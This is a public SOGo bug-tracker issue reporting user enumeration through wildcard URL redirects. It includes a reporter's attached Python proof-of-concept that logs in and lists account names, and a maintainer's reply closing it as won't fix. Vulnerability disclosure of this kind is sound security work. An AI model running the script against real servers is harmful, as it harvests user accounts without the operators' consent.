View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0002382 | SOGo | Web General | public | 2013-07-29 14:39 | 2013-07-29 14:51 |
Reporter | ispoljaric | Assigned To | |||
Priority | normal | Severity | minor | Reproducibility | always |
Status | closed | Resolution | won't fix | ||
Product Version | 2.0.6 | ||||
Summary | 0002382: Information leak of LDAP entries. | ||||
Description | It is possible to force a redirect to any account that can log in to Sogo. The malicious user needs to be authenticated to get access to the url manipulation. | ||||
Steps To Reproduce | In my example, the url to be manipulated is http://sogo.labos.nimium.local/SOGo/so/ Basically, you use the redirect that expands the wildcard request. After that, we get message : but still the username was leaked. | ||||
Additional Information | There is a python script attached that extracts partial or full list of users on sogo. Usage: python sogo_ldap_injection.py 'username' 'password' 'http://sogo.labos.nimium.local/SOGo/' | ||||
Tags | No tags attached. | ||||
2013-07-29 14:39
|
sogo_ldap_injection.py (783 bytes)
#!/usr/local/bin/python import requests import string def login(uname,password,url): return requests.post( url+'/connect', data={'userName':uname, 'password':password} ).cookies def extract(url,cookie): for i in string.ascii_lowercase: c = requests.get(url+i+'*/view',cookies=cookie).url if '*' not in c: print c.split('/')[c.split('/').index('so')+1] # If we want full uids, we just need to make it recursive # Uncomment the next line if you want really really slow extraction of everything #extract(url+i,cookie) if __name__=='__main__': import sys session = login(sys.argv[1],sys.argv[2],sys.argv[3]) extract(sys.argv[3]+'/so/',session) |
This isn't a problem in itself. If you are authenticated, you can very well simply list all valid users when you want to share your calendar or subscribe to one. Your script shows nothing more that SOGo doesn't expose already for a reason. |
|
Date Modified | Username | Field | Change |
---|---|---|---|
2013-07-29 14:39 | ispoljaric | New Issue | |
2013-07-29 14:39 | ispoljaric | File Added: sogo_ldap_injection.py | |
2013-07-29 14:51 | ludovic | Note Added: 0005774 | |
2013-07-29 14:51 | ludovic | Status | new => closed |
2013-07-29 14:51 | ludovic | Resolution | open => won't fix |